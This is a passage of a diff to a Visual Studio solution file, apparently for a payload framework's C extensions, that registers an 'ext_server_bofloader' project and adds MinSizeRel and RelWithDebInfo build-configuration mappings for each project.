..\source\common\common_core.h = ..\source\common\common_core.h ..\source\common\common_exports.h = ..\source\common\common_exports.h ..\source\common\common_list.h = ..\source\common\common_list.h - ..\source\logging\logging.c = ..\source\logging\logging.c ..\source\common\common_logging.h = ..\source\common\common_logging.h ..\source\common\common_metapi.h = ..\source\common\common_metapi.h ..\source\common\common_pivot_tree.h = ..\source\common\common_pivot_tree.h ..\source\common\common_remote.h = ..\source\common\common_remote.h ..\source\common\common_scheduler.h = ..\source\common\common_scheduler.h ..\source\common\common_thread.h = ..\source\common\common_thread.h + ..\source\logging\logging.c = ..\source\logging\logging.c EndProjectSection EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Def", "Def", "{275C6D8C-8EC0-4FCF-96CB-F6B793FC38DB}" @@ -72,20 +72,30 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Def", "Def", "{275C6D8C-8EC ..\source\def\plugin.def = ..\source\def\plugin.def EndProjectSection EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_bofloader", "ext_server_bofloader\ext_server_bofloader.vcxproj", "{486B160F-C571-486D-AAC3-CB60CEA7CBDD}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 Debug|x64 = Debug|x64 + MinSizeRel|Win32 = MinSizeRel|Win32 + MinSizeRel|x64 = MinSizeRel|x64 r7_release|Win32 = r7_release|Win32 r7_release|x64 = r7_release|x64 Release|Win32 = Release|Win32 Release|x64 = Release|x64 + RelWithDebInfo|Win32 = RelWithDebInfo|Win32 + RelWithDebInfo|x64 = RelWithDebInfo|x64 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|Win32.ActiveCfg = Debug|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|Win32.Build.0 = Debug|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|x64.ActiveCfg = Debug|x64 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|x64.Build.0 = Debug|x64 + {87C64204-C82F-415D-AF45-D0B33BDFE39A}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {87C64204-C82F-415D-AF45-D0B33BDFE39A}.MinSizeRel|Win32.Build.0 = Release|Win32 + {87C64204-C82F-415D-AF45-D0B33BDFE39A}.MinSizeRel|x64.ActiveCfg = Release|x64 + {87C64204-C82F-415D-AF45-D0B33BDFE39A}.MinSizeRel|x64.Build.0 = Release|x64 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.r7_release|Win32.ActiveCfg = r7_release|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.r7_release|Win32.Build.0 = r7_release|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -94,10 +104,18 @@ Global {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|Win32.Build.0 = Release|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|x64.ActiveCfg = Release|x64 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|x64.Build.0 = Release|x64 + {87C64204-C82F-415D-AF45-D0B33BDFE39A}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {87C64204-C82F-415D-AF45-D0B33BDFE39A}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {87C64204-C82F-415D-AF45-D0B33BDFE39A}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {87C64204-C82F-415D-AF45-D0B33BDFE39A}.RelWithDebInfo|x64.Build.0 = Release|x64 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|Win32.ActiveCfg = Debug|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|Win32.Build.0 = Debug|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|x64.ActiveCfg = Debug|x64 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|x64.Build.0 = Debug|x64 + {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.MinSizeRel|Win32.Build.0 = Release|Win32 + {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.MinSizeRel|x64.ActiveCfg = Release|x64 + {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.MinSizeRel|x64.Build.0 = Release|x64 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.r7_release|Win32.ActiveCfg = r7_release|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.r7_release|Win32.Build.0 = r7_release|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -106,10 +124,18 @@ Global {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|Win32.Build.0 = Release|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|x64.ActiveCfg = Release|x64 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|x64.Build.0 = Release|x64 + {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.RelWithDebInfo|x64.Build.0 = Release|x64 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|Win32.ActiveCfg = Debug|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|Win32.Build.0 = Debug|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|x64.ActiveCfg = Debug|x64 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|x64.Build.0 = Debug|x64 + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.MinSizeRel|Win32.Build.0 = Release|Win32 + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.MinSizeRel|x64.ActiveCfg = Release|x64 + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.MinSizeRel|x64.Build.0 = Release|x64 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.r7_release|Win32.ActiveCfg = r7_release|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.r7_release|Win32.Build.0 = r7_release|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -118,10 +144,18 @@ Global {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|Win32.Build.0 = Release|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|x64.ActiveCfg = Release|x64 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|x64.Build.0 = Release|x64 + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.RelWithDebInfo|x64.Build.0 = Release|x64 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|Win32.ActiveCfg = Debug|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|Win32.Build.0 = Debug|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|x64.ActiveCfg = Debug|x64 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|x64.Build.0 = Debug|x64 + {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.MinSizeRel|Win32.Build.0 = Release|Win32 + {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.MinSizeRel|x64.ActiveCfg = Release|x64 + {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.MinSizeRel|x64.Build.0 = Release|x64 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.r7_release|Win32.ActiveCfg = r7_release|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.r7_release|Win32.Build.0 = r7_release|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -130,10 +164,18 @@ Global {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|Win32.Build.0 = Release|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|x64.ActiveCfg = Release|x64 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|x64.Build.0 = Release|x64 + {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.RelWithDebInfo|x64.Build.0 = Release|x64 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.ActiveCfg = Debug|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.Build.0 = Debug|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|x64.ActiveCfg = Debug|x64 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|x64.Build.0 = Debug|x64 + {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.MinSizeRel|Win32.Build.0 = Release|Win32 + {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.MinSizeRel|x64.ActiveCfg = Release|x64 + {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.MinSizeRel|x64.Build.0 = Release|x64 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.r7_release|Win32.ActiveCfg = r7_release|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.r7_release|Win32.Build.0 = r7_release|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -142,10 +184,18 @@ Global {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.Build.0 = Release|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|x64.ActiveCfg = Release|x64 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|x64.Build.0 = Release|x64 + {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.RelWithDebInfo|x64.Build.0 = Release|x64 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|Win32.ActiveCfg = Debug|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|Win32.Build.0 = Debug|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|x64.ActiveCfg = Debug|x64 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|x64.Build.0 = Debug|x64 + {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.MinSizeRel|Win32.Build.0 = Release|Win32 + {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.MinSizeRel|x64.ActiveCfg = Release|x64 + {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.MinSizeRel|x64.Build.0 = Release|x64 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.r7_release|Win32.ActiveCfg = r7_release|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.r7_release|Win32.Build.0 = r7_release|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -154,10 +204,18 @@ Global {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|Win32.Build.0 = Release|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|x64.ActiveCfg = Release|x64 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|x64.Build.0 = Release|x64 + {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.RelWithDebInfo|x64.Build.0 = Release|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|Win32.ActiveCfg = Debug|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|Win32.Build.0 = Debug|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|x64.ActiveCfg = Debug|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|x64.Build.0 = Debug|x64 + {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.MinSizeRel|Win32.Build.0 = Release|Win32 + {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.MinSizeRel|x64.ActiveCfg = Release|x64 + {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.MinSizeRel|x64.Build.0 = Release|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.r7_release|Win32.ActiveCfg = r7_release|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.r7_release|Win32.Build.0 = r7_release|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -166,10 +224,18 @@ Global {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|Win32.Build.0 = Release|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.ActiveCfg = Release|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.Build.0 = Release|x64 + {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.RelWithDebInfo|x64.Build.0 = Release|x64 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|Win32.ActiveCfg = Debug|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|Win32.Build.0 = Debug|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|x64.ActiveCfg = Debug|x64 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|x64.Build.0 = Debug|x64 + {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.MinSizeRel|Win32.Build.0 = Release|Win32 + {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.MinSizeRel|x64.ActiveCfg = Release|x64 + {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.MinSizeRel|x64.Build.0 = Release|x64 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.r7_release|Win32.ActiveCfg = r7_release|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.r7_release|Win32.Build.0 = r7_release|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -178,18 +244,34 @@ Global {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|Win32.Build.0 = Release|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|x64.ActiveCfg = Release|x64 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|x64.Build.0 = Release|x64 + {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.RelWithDebInfo|x64.Build.0 = Release|x64 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.ActiveCfg = Debug|Win32 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|x64.ActiveCfg = Debug|x64 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.MinSizeRel|Win32.ActiveCfg = r7_release|Win32 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.MinSizeRel|Win32.Build.0 = r7_release|Win32 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.MinSizeRel|x64.ActiveCfg = r7_release|x64 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.MinSizeRel|x64.Build.0 = r7_release|x64 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.r7_release|Win32.ActiveCfg = r7_release|Win32 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.r7_release|Win32.Build.0 = r7_release|Win32 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.r7_release|x64.ActiveCfg = r7_release|x64 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.r7_release|x64.Build.0 = r7_release|x64 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.ActiveCfg = r7_release|Win32 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|x64.ActiveCfg = r7_release|x64 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.RelWithDebInfo|Win32.ActiveCfg = r7_release|Win32 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.RelWithDebInfo|Win32.Build.0 = r7_release|Win32 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.RelWithDebInfo|x64.ActiveCfg = r7_release|x64 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.RelWithDebInfo|x64.Build.0 = r7_release|x64 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Debug|Win32.ActiveCfg = Debug|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Debug|Win32.Build.0 = Debug|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Debug|x64.ActiveCfg = Debug|x64 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Debug|x64.Build.0 = Debug|x64 + {42E143CB-6086-4FF1-A4AE-D8545782DD31}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {42E143CB-6086-4FF1-A4AE-D8545782DD31}.MinSizeRel|Win32.Build.0 = Release|Win32 + {42E143CB-6086-4FF1-A4AE-D8545782DD31}.MinSizeRel|x64.ActiveCfg = Release|x64 + {42E143CB-6086-4FF1-A4AE-D8545782DD31}.MinSizeRel|x64.Build.0 = Release|x64 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.r7_release|Win32.ActiveCfg = r7_release|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.r7_release|Win32.Build.0 = r7_release|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -198,10 +280,18 @@ Global {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Release|Win32.Build.0 = Release|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Release|x64.ActiveCfg = Release|x64 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Release|x64.Build.0 = Release|x64 + {42E143CB-6086-4FF1-A4AE-D8545782DD31}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {42E143CB-6086-4FF1-A4AE-D8545782DD31}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {42E143CB-6086-4FF1-A4AE-D8545782DD31}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {42E143CB-6086-4FF1-A4AE-D8545782DD31}.RelWithDebInfo|x64.Build.0 = Release|x64 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|Win32.ActiveCfg = Debug|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|Win32.Build.0 = Debug|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|x64.ActiveCfg = Debug|x64 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|x64.Build.0 = Debug|x64 + {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.MinSizeRel|Win32.Build.0 = Release|Win32 + {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.MinSizeRel|x64.ActiveCfg = Release|x64 + {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.MinSizeRel|x64.Build.0 = Release|x64 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|Win32.ActiveCfg = r7_release|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|Win32.Build.0 = r7_release|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -210,10 +300,18 @@ Global {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|Win32.Build.0 = Release|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|x64.ActiveCfg = Release|x64 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|x64.Build.0 = Release|x64 + {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.RelWithDebInfo|x64.Build.0 = Release|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Debug|Win32.ActiveCfg = Debug|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Debug|Win32.Build.0 = Debug|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Debug|x64.ActiveCfg = Debug|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Debug|x64.Build.0 = Debug|x64 + {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.MinSizeRel|Win32.Build.0 = Release|Win32 + {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.MinSizeRel|x64.ActiveCfg = Release|x64 + {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.MinSizeRel|x64.Build.0 = Release|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.r7_release|Win32.ActiveCfg = r7_release|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.r7_release|Win32.Build.0 = r7_release|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -222,10 +320,18 @@ Global {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|Win32.Build.0 = Release|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|x64.ActiveCfg = Release|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|x64.Build.0 = Release|x64 + {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.RelWithDebInfo|x64.Build.0 = Release|x64 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Debug|Win32.ActiveCfg = Debug|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Debug|Win32.Build.0 = Debug|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Debug|x64.ActiveCfg = Debug|x64 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Debug|x64.Build.0 = Debug|x64 + {28D39E90-259B-4DCE-88A7-7D2B568809DC}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {28D39E90-259B-4DCE-88A7-7D2B568809DC}.MinSizeRel|Win32.Build.0 = Release|Win32 + {28D39E90-259B-4DCE-88A7-7D2B568809DC}.MinSizeRel|x64.ActiveCfg = Release|x64 + {28D39E90-259B-4DCE-88A7-7D2B568809DC}.MinSizeRel|x64.Build.0 = Release|x64 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.r7_release|Win32.ActiveCfg = r7_release|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.r7_release|Win32.Build.0 = r7_release|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -234,10 +340,18 @@ Global {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Release|Win32.Build.0 = Release|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Release|x64.ActiveCfg = Release|x64 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Release|x64.Build.0 = Release|x64 + {28D39E90-259B-4DCE-88A7-7D2B568809DC}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {28D39E90-259B-4DCE-88A7-7D2B568809DC}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {28D39E90-259B-4DCE-88A7-7D2B568809DC}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {28D39E90-259B-4DCE-88A7-7D2B568809DC}.RelWithDebInfo|x64.Build.0 = Release|x64 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Debug|Win32.ActiveCfg = Debug|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Debug|Win32.Build.0 = Debug|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Debug|x64.ActiveCfg = Debug|x64 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Debug|x64.Build.0 = Debug|x64 + {A29BE1E5-5122-4BD4-82CE-25418D29648E}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {A29BE1E5-5122-4BD4-82CE-25418D29648E}.MinSizeRel|Win32.Build.0 = Release|Win32 + {A29BE1E5-5122-4BD4-82CE-25418D29648E}.MinSizeRel|x64.ActiveCfg = Release|x64 + {A29BE1E5-5122-4BD4-82CE-25418D29648E}.MinSizeRel|x64.Build.0 = Release|x64 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.r7_release|Win32.ActiveCfg = r7_release|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.r7_release|Win32.Build.0 = r7_release|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -246,10 +360,18 @@ Global {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Release|Win32.Build.0 = Release|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Release|x64.ActiveCfg = Release|x64 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Release|x64.Build.0 = Release|x64 + {A29BE1E5-5122-4BD4-82CE-25418D29648E}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {A29BE1E5-5122-4BD4-82CE-25418D29648E}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {A29BE1E5-5122-4BD4-82CE-25418D29648E}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {A29BE1E5-5122-4BD4-82CE-25418D29648E}.RelWithDebInfo|x64.Build.0 = Release|x64 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Debug|Win32.ActiveCfg = Debug|Win32 